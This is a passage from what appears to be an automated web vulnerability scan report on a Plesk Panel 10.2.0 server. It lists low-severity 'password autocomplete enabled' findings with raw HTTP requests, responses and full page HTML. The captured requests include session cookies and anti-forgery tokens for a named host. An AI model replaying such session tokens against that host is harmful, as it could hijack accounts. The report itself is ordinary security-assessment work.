<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fbackup%252F%2Froot%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fdbbackup%252F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fbackup%252Flocal-repository%252F%26src%3D%252Fsmb%252Fweb%252Fview%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Personal FTP Repository Settings</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/client.domain.backup.ftp-repository.properties/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/backup/ftp-repository/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;
function passiveModeChanged()
{
   if ( $('fid-ftp_passive_mode_checkbox').checked ) {
       $('ftp_passive_mode').value = "true";
   } else {
       $('ftp_passive_mode').value = "false";
   }
}

function initScreen()
{
   $('fid-ftp_passive_mode_checkbox').observe('click', passiveModeChanged);
   passiveModeChanged();
}

if (Prototype.Browser.IE) {
   Event.observe(window, "load", initScreen);
} else {
   Event.observe(document, "dom:loaded", initScreen);
}

function update_oC(f)
{
   if (f.ftp_password.value != f.ftp_confirm_password.value) {
       alert('Passwords do not match!');
       return false;
   }
   lsubmit(f);
   return true;
}
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [{"componentType":"Jsw.Pathbar.Item","title":"Backup Manager: Personal FTP Repository","href":"\/plesk\/client@2\/domain@1\/backup\/ftp-repository\/"}]
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/backup/ftp-repository/properties/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset><legend>Settings</legend>

<table class="formFields" cellspacing="0" width="100%">
   <tr >
       <td class="name"><label for="fid-ftp_server">FTP server hostname or IP&nbsp;<span class="required">*</span></label></td>
       <td><input type="text" name="ftp_server" id="fid-ftp_server" value="" size="35" maxlength="255"></td>
   </tr>
   <tr >
       <td class="name"><label for="fid-ftp_basedir">Directory for backup files storage&nbsp;</label></td>
       <td><input type="text" name="ftp_basedir" id="fid-ftp_basedir" value="" size="35" maxlength="255"><div class="hint">For example, /myfolder/mybackups/</div></td>
   </tr>
   <tr >
       <td class="name"><label for="fid-ftp_login">FTP username&nbsp;<span class="required">*</span></label></td>
       <td><input type="text" name="ftp_login" id="fid-ftp_login" value="" size="35" maxlength="255"></td>
   </tr>
   
   <tr>
       <td class="name">Old FTP password</td>
       <td>None</td>
   </tr>
   <tr >
       <td class="name"><label for="fid-ftp_password">FTP password</label>&nbsp;<span class="required">*</span></td>
       <td><INPUT maxlength="255" name="ftp_password" id="fid-ftp_password" type="password" value="" size="25"></td>
   </tr>
   <tr >
       <td class="name"><label for="fid-ftp_confirm_password">Confirm FTP password</label>&nbsp;<span class="required">*</span></td>
       <td><INPUT maxlength="255" name="ftp_confirm_password" id="fid-ftp_confirm_password" type="password" value="" size="25"></td>
   </tr>
   <tr>
       <td class="name"><label for="fid-ftp_passive_mode_checkbox">Use passive mode</label></td>
       <td>
           <input type="checkbox" class="checkbox" name="ftp_passive_mode_checkbox" id="fid-ftp_passive_mode_checkbox" value="true" />
           <input type="hidden" id="ftp_passive_mode" name="ftp_passive_mode" value="" />
       </td>
   </tr>
</table>

</fieldset>
   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply all changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return update_oC(document.forms[0]);return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="submit" onClick="Event.stop(event);return update_oC(document.forms[0]);return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/ftp-repository/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/ftp-repository/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="48333f77aef379c04c82252b59636182">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

6.2. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/odbc/dsn@1/properties/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/odbc/dsn@1/properties/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /plesk/client@2/domain@1/odbc/dsn@1/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/odbc/dsn@new/properties/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dsnlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:09:15 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:09:15 GMT
Connection: close
Content-Length: 17771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fcertificate%2540%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fmpc-certificates%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Set Up an ODBC Connection</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/odbc_connection_config_mssql/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/odbc/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;
var required = new Array('DRIVER', 'SERVER', 'UID', 'PWD');

function chk_fields(f) {

   // scan form for input fields
   for (i=0; i<f.elements.length; i++) {

       if ((f.elements[i].type == 'text' || f.elements[i].type == 'password') && f.elements[i].value == '') {

           // find if this variable is required or not
           req = false;
           for (j=0; j<required.length; j++) {
               if (f.elements[i].name == required[j]) {
                   req = 1;
                   break;
               }
           }

           if (req) {

               // required elements should be set
               alert("Required parameters are not supplied.");
               f.elements[i].focus();
               f.elements[i].select();
               return false;

           } else {

               // don't submit empty not required variables
               f.elements[i].disabled = true;
           }
       }
   }
   return true;
}

function check_data(f) { if (chk_fields(f)) { f.cmd.value = 'check'; lsubmit(f); } }
function update_data(f) { if (chk_fields(f)) { f.cmd.value = 'update'; lsubmit(f); } }
function test_connection(f) { if (chk_fields(f)) { f.cmd.value = 'test'; lsubmit(f); } }
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/odbc/dsn@1/properties/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset>

<legend>Settings</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<table class="formFields" cellspacing="0" width="100%">


<tr>
   <td class="name">[DRIVER] &nbsp;Driver</td>
   <td>SQL Server<input type="hidden" name="DRIVER" value="SQL Server"></td>
</tr>

<tr>
   <td class="name">[SERVER] &nbsp;<span class="required">*</span>&nbsp;Server</td>
   <td><input type="text" name="SERVER" value="(local)" ></td>
</tr>

<tr>
   <td class="name">[UID] &nbsp;<span class="required">*</span>&nbsp;Login ID</td>
   <td><input type="text" name="UID" value="" ></td>
</tr>

<tr>
   <td class="name">[PWD] &nbsp;<span class="required">*</span>&nbsp;Password</td>
   <td><input type="password" name="PWD" value="" ></td>
</tr>

<tr>
   <td class="name">[DATABASE] &nbsp;&nbsp;Default database for the ODBC data source</td>
   <td><input type="text" name="DATABASE" value="" ></td>
</tr>

<tr>
   <td class="name">[APP] &nbsp;&nbsp;Application name</td>
   <td><input type="text" name="APP" value="" ></td>
</tr>

<tr>
   <td class="name">[WSID] &nbsp;&nbsp;Workstation ID</td>
   <td><input type="text" name="WSID" value="" ></td>
</tr>

<tr>
   <td class="name">[LANGUAGE] &nbsp;&nbsp;Default national language to use</td>
   <td><select name="LANGUAGE" id="fid-LANGUAGE" >    <option value='' SELECTED></option>
   <option value='Arabic'>Arabic</option>
   <option value='Brazilian'>Brazilian</option>
   <option value='British English'>British English</option>
   <option value='Bulgarian'>Bulgarian</option>
   <option value='Croatian'>Croatian</option>
   <option value='Czech'>Czech</option>
   <option value='Danish'>Danish</option>
   <option value='Dansk'>Dansk</option>
   <option value='Deutsch'>Deutsch</option>
   <option value='Dutch'>Dutch</option>
   <option value='English'>English</option>
   <option value='Estonian'>Estonian</option>
   <option value='Finnish'>Finnish</option>
   <option value='French'>French</option>
   <option value='German'>German</option>
   <option value='Greek'>Greek</option>
   <option value='Hungarian'>Hungarian</option>
   <option value='Italian'>Italian</option>
   <option value='Japanese'>Japanese</option>
   <option value='Korean'>Korean</option>
   <option value='Latvian'>Latvian</option>
   <option value='Lithuanian'>Lithuanian</option>
   <option value='Magyar'>Magyar</option>
   <option value='Nederlands'>Nederlands</option>
   <option value='Norwegian'>Norwegian</option>
   <option value='Polish'>Polish</option>
   <option value='Portuguese'>Portuguese</option>
   <option value='Romanian'>Romanian</option>
   <option value='Russian'>Russian</option>
   <option value='Simplified Chinese'>Simplified Chinese</option>
   <option value='Slovak'>Slovak</option>
   <option value='Slovenian'>Slovenian</option>
   <option value='Spanish'>Spanish</option>
   <option value='Suomi'>Suomi</option>
   <option value='Svenska'>Svenska</option>
   <option value='Swedish'>Swedish</option>
   <option value='Thai'>Thai</option>
   <option value='Traditional Chinese'>Traditional Chinese</option>
   <option value='Turkish'>Turkish</option>
   <option value='Us_english'>Us_english</option>
</select>
</td>
</tr>

<tr>
   <td class="name">[OEMTOANSI] &nbsp;&nbsp;Conversion of extended characters to OEM values</td>
   <td><select name="OEMTOANSI" id="fid-OEMTOANSI" >    <option value='' SELECTED></option>
   <option value='437 code page'>437 code page</option>
   <option value='850 code page'>850 code page</option>
   <option value='ISO 8859-1'>ISO 8859-1</option>
</select>
</td>
</tr>














</table>



</td></tr></table></fieldset>

   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-next" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Check the currently defined settings.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);check_data(document.forms[0]);;return false;" style=""><BUTTON name="bname_next" id="buttonid-next" type="button" onClick="Event.stop(event);check_data(document.forms[0]);;return false;">Next &gt;&gt;</BUTTON><SPAN id="spanid-next">Next &gt;&gt;</SPAN></DIV>&nbsp;<SPAN class="commonButton" id="bid-finish-disabled" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;This feature is currently unavailable.&quot;&#125;]);" onMouseOut="tooltip.hide();" style=""><BUTTON name="bname_finish" disabled id="buttonid-finish-disabled" type="button">Finish</BUTTON><SPAN id="spanid-finish-disabled">Finish</SPAN></SPAN>&nbsp;<DIV class="commonButton" id="bid-test" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Try to connect to the data source with current parameters.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);test_connection(document.forms[0]);;return false;" style=""><BUTTON name="bname_test" id="buttonid-test" type="button" onClick="Event.stop(event);test_connection(document.forms[0]);;return false;">Test Connection</BUTTON><SPAN id="spanid-test">Test Connection</SPAN></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/odbc/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/odbc/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

6.3. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/my-profile  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/my-profile

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /smb/my-profile HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; no_frames=deleted; no_frames_login_page=deleted;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:22:32 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:22:32 GMT
Connection: close
Content-Length: 41318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>My Profile - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/my-profile/action-name/index" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fmy-profile' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
